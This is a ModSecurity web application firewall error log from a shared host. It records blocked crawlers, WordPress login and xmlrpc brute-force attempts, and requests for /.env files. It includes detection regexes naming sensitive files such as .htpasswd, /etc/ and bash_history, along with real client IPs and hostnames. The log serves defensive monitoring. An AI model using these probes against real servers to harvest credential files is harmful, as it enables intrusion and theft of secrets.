[Tue May 26 18:00:41.051605 2026] [security2:error] [pid 946381:tid 946589] [client 114.119.156.95:26033] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.siliconelevators.in"] [uri "/images/siliconelevators-product-Panel-LandingPanelDotMatrix.jpg"] [unique_id "ahWScdiTu5WG4Dm5WpoUMgAAAE4"], referer: https://www.siliconelevators.in/siliconelevators-products.php
[Tue May 26 18:00:41.440278 2026] [security2:error] [pid 946381:tid 946563] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWScNiTu5WG4Dm5WpoULAAAADQ"]
[Tue May 26 18:00:42.135732 2026] [security2:error] [pid 946381:tid 946567] [client 23.236.139.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWSctiTu5WG4Dm5WpoUSgAAADg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 18:00:43.233000 2026] [security2:error] [pid 946381:tid 946597] [client 86.8.157.82:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSctiTu5WG4Dm5WpoUYwAAAFY"]
[Tue May 26 18:00:43.389349 2026] [security2:error] [pid 946381:tid 946616] [client 185.191.171.6:60840] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/tag/list/"] [unique_id "ahWSc9iTu5WG4Dm5WpoUdQAAAGk"]
[Tue May 26 18:00:43.389501 2026] [security2:error] [pid 946381:tid 946616] [client 185.191.171.6:60840] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/tag/list/"] [unique_id "ahWSc9iTu5WG4Dm5WpoUdQAAAGk"]
[Tue May 26 18:00:44.051935 2026] [security2:error] [pid 946381:tid 946534] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSc9iTu5WG4Dm5WpoUewAAABc"]
[Tue May 26 18:00:44.706960 2026] [security2:error] [pid 946381:tid 946593] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWSdNiTu5WG4Dm5WpoUkgAAAFI"]
[Tue May 26 18:00:44.707348 2026] [security2:error] [pid 946381:tid 946561] [client 66.249.64.109:64447] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWSdNiTu5WG4Dm5WpoUkAAAADI"]
[Tue May 26 18:00:45.028496 2026] [security2:error] [pid 946381:tid 946607] [client 23.236.139.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWSdNiTu5WG4Dm5WpoUngAAAGA"], referer: https://anujtradingco.com
[Tue May 26 18:00:46.105938 2026] [security2:error] [pid 946381:tid 946616] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSddiTu5WG4Dm5WpoUtAAAAGk"]
[Tue May 26 18:00:48.700001 2026] [security2:error] [pid 946381:tid 946623] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSeNiTu5WG4Dm5WpoU8gAAAHA"]
[Tue May 26 18:00:49.220677 2026] [security2:error] [pid 946381:tid 946437] [remote 211.23.68.235:27184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSediTu5WG4Dm5WpoVDwAAfDc"]
[Tue May 26 18:00:49.836365 2026] [security2:error] [pid 946381:tid 946626] [client 34.63.226.73:55904] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kingsclubbanquet.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWSediTu5WG4Dm5WpoVGgAAAHM"]
[Tue May 26 18:00:50.212000 2026] [security2:error] [pid 946381:tid 946448] [remote 47.128.116.94:13338] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/features/isotope-grid/page/2/"] [unique_id "ahWSetiTu5WG4Dm5WpoVJwAAdEI"]
[Tue May 26 18:00:51.826089 2026] [security2:error] [pid 946381:tid 946539] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSe9iTu5WG4Dm5WpoVQgAAABw"]
[Tue May 26 18:00:54.558959 2026] [security2:error] [pid 946381:tid 946588] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSftiTu5WG4Dm5WpoVjQAAAE0"]
[Tue May 26 18:00:54.909263 2026] [security2:error] [pid 946381:tid 946582] [client 82.76.238.33:53611] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSftiTu5WG4Dm5WpoVmgAAAEc"]
[Tue May 26 18:00:54.909409 2026] [security2:error] [pid 946381:tid 946582] [client 82.76.238.33:53611] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSftiTu5WG4Dm5WpoVmgAAAEc"]
[Tue May 26 18:00:55.609501 2026] [security2:error] [pid 946381:tid 946487] [remote 103.11.102.106:51600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWSf9iTu5WG4Dm5WpoVtwAAE2k"]
[Tue May 26 18:00:56.305208 2026] [security2:error] [pid 946381:tid 946564] [client 34.63.226.73:64668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.226.63.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahWSgNiTu5WG4Dm5WpoVxgAAADU"]
[Tue May 26 18:00:56.305336 2026] [security2:error] [pid 946381:tid 946564] [client 34.63.226.73:64668] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahWSgNiTu5WG4Dm5WpoVxgAAADU"]
[Tue May 26 18:00:56.814102 2026] [security2:error] [pid 946381:tid 946545] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSgNiTu5WG4Dm5WpoVzgAAACI"]
[Tue May 26 18:00:58.464934 2026] [security2:error] [pid 946381:tid 946495] [remote 31.24.44.107:47250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWSgtiTu5WG4Dm5WpoWEgAAdXE"]
[Tue May 26 18:00:59.637913 2026] [security2:error] [pid 946381:tid 946633] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSg9iTu5WG4Dm5WpoWNgAAAHo"]
[Tue May 26 18:01:02.365040 2026] [security2:error] [pid 946381:tid 946632] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWShdiTu5WG4Dm5WpoWcQAAAHk"]
[Tue May 26 18:01:02.763284 2026] [security2:error] [pid 946381:tid 946440] [remote 103.11.102.106:51602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWShtiTu5WG4Dm5WpoWggAAKTo"]
[Tue May 26 18:01:02.889811 2026] [security2:error] [pid 946381:tid 946592] [client 82.76.238.33:53890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWShtiTu5WG4Dm5WpoWiQAAAFE"]
[Tue May 26 18:01:02.889932 2026] [security2:error] [pid 946381:tid 946592] [client 82.76.238.33:53890] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWShtiTu5WG4Dm5WpoWiQAAAFE"]
[Tue May 26 18:01:04.929312 2026] [security2:error] [pid 946381:tid 946633] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSiNiTu5WG4Dm5WpoWsgAAAHo"]
[Tue May 26 18:01:05.420400 2026] [security2:error] [pid 946381:tid 946428] [remote 103.91.67.202:47506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWSidiTu5WG4Dm5WpoWwgAAQi4"]
[Tue May 26 18:01:05.901615 2026] [security2:error] [pid 946381:tid 946443] [remote 103.91.67.202:47506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWSidiTu5WG4Dm5WpoWzQAAPz0"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 18:01:06.931576 2026] [security2:error] [pid 946381:tid 946576] [client 74.7.230.40:34810] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.systemprintsn.azurmediatec.com"] [uri "/robots.txt"] [unique_id "ahWSitiTu5WG4Dm5WpoW5gAAQTM"]
[Tue May 26 18:01:07.100765 2026] [security2:error] [pid 946381:tid 946625] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSitiTu5WG4Dm5WpoW5QAAAHI"]
[Tue May 26 18:01:07.174564 2026] [security2:error] [pid 946381:tid 946473] [remote 74.7.241.58:36898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWSi9iTu5WG4Dm5WpoW7gAAAFs"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/th
[Tue May 26 18:01:07.977975 2026] [security2:error] [pid 946381:tid 946527] [client 74.7.175.156:42278] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "systemprintsn.azurmediatec.com"] [uri "/robots.txt"] [unique_id "ahWSi9iTu5WG4Dm5WpoW_AAAEFA"]
[Tue May 26 18:01:10.056425 2026] [security2:error] [pid 946381:tid 946558] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSjdiTu5WG4Dm5WpoXIAAAAC8"]
[Tue May 26 18:01:12.174056 2026] [security2:error] [pid 946381:tid 946541] [client 82.76.238.33:54408] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSkNiTu5WG4Dm5WpoXXwAAAB4"]
[Tue May 26 18:01:12.174200 2026] [security2:error] [pid 946381:tid 946541] [client 82.76.238.33:54408] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSkNiTu5WG4Dm5WpoXXwAAAB4"]
[Tue May 26 18:01:12.440903 2026] [security2:error] [pid 946381:tid 946628] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSkNiTu5WG4Dm5WpoXWwAAAHU"]
[Tue May 26 18:01:12.666105 2026] [security2:error] [pid 946381:tid 946469] [remote 3.208.180.187:52192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWSkNiTu5WG4Dm5WpoXaQAAalc"]
[Tue May 26 18:01:13.536539 2026] [security2:error] [pid 946381:tid 946638] [client 14.173.102.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSkdiTu5WG4Dm5WpoXdgAAAH8"]
[Tue May 26 18:01:15.156584 2026] [security2:error] [pid 946381:tid 946564] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSktiTu5WG4Dm5WpoXnwAAADU"]
[Tue May 26 18:01:15.433413 2026] [security2:error] [pid 946381:tid 946388] [remote 178.156.182.155:42966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSk9iTu5WG4Dm5WpoXrwAAagY"]
[Tue May 26 18:01:17.602344 2026] [security2:error] [pid 946381:tid 946570] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSldiTu5WG4Dm5WpoX8gAAADs"]
[Tue May 26 18:01:19.864311 2026] [security2:error] [pid 946381:tid 946386] [remote 54.36.102.244:50412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWSl9iTu5WG4Dm5WpoYNgAAIgQ"]
[Tue May 26 18:01:20.290402 2026] [security2:error] [pid 946381:tid 946560] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSl9iTu5WG4Dm5WpoYPAAAADE"]
[Tue May 26 18:01:22.533564 2026] [security2:error] [pid 946381:tid 946585] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSmtiTu5WG4Dm5WpoYZwAAAEo"]
[Tue May 26 18:01:22.611319 2026] [security2:error] [pid 946381:tid 946543] [client 82.76.238.33:54865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSmtiTu5WG4Dm5WpoYbgAAACA"]
[Tue May 26 18:01:22.611450 2026] [security2:error] [pid 946381:tid 946543] [client 82.76.238.33:54865] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSmtiTu5WG4Dm5WpoYbgAAACA"]
[Tue May 26 18:01:24.926386 2026] [security2:error] [pid 946381:tid 946554] [client 77.83.39.197:60180] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/.env"] [unique_id "ahWSnNiTu5WG4Dm5WpoYqgAAACs"]
[Tue May 26 18:01:25.469014 2026] [security2:error] [pid 946381:tid 946536] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSndiTu5WG4Dm5WpoYsAAAABk"]
[Tue May 26 18:01:26.335972 2026] [security2:error] [pid 946381:tid 946398] [remote 193.42.61.12:44298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWSntiTu5WG4Dm5WpoY0QAAYxA"]
[Tue May 26 18:01:26.578376 2026] [security2:error] [pid 946381:tid 946410] [remote 193.42.61.12:44298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWSntiTu5WG4Dm5WpoY1QAAYhw"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 18:01:27.594861 2026] [security2:error] [pid 946381:tid 946554] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSn9iTu5WG4Dm5WpoY6wAAACs"]
[Tue May 26 18:01:30.791907 2026] [security2:error] [pid 946381:tid 946608] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSotiTu5WG4Dm5WpoZWAAAAGE"]
[Tue May 26 18:01:31.370226 2026] [security2:error] [pid 946381:tid 946508] [remote 178.104.90.233:52590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWSo9iTu5WG4Dm5WpoZbAAAVX4"]
[Tue May 26 18:01:31.760342 2026] [security2:error] [pid 946381:tid 946574] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWSotiTu5WG4Dm5WpoZVQAAAD8"], referer: https://www.bloggertarget.com
[Tue May 26 18:01:32.509080 2026] [security2:error] [pid 946381:tid 946545] [client 114.119.156.154:37657] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "eco-green.com.mx"] [uri "/wp-sitemap.xml"] [unique_id "ahWSpNiTu5WG4Dm5WpoZjwAAACI"], referer: https://eco-green.com.mx/wp-sitemap.xml
[Tue May 26 18:01:32.723785 2026] [security2:error] [pid 946381:tid 946594] [client 77.83.39.197:39114] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/.env"] [unique_id "ahWSpNiTu5WG4Dm5WpoZlwAAAFM"]
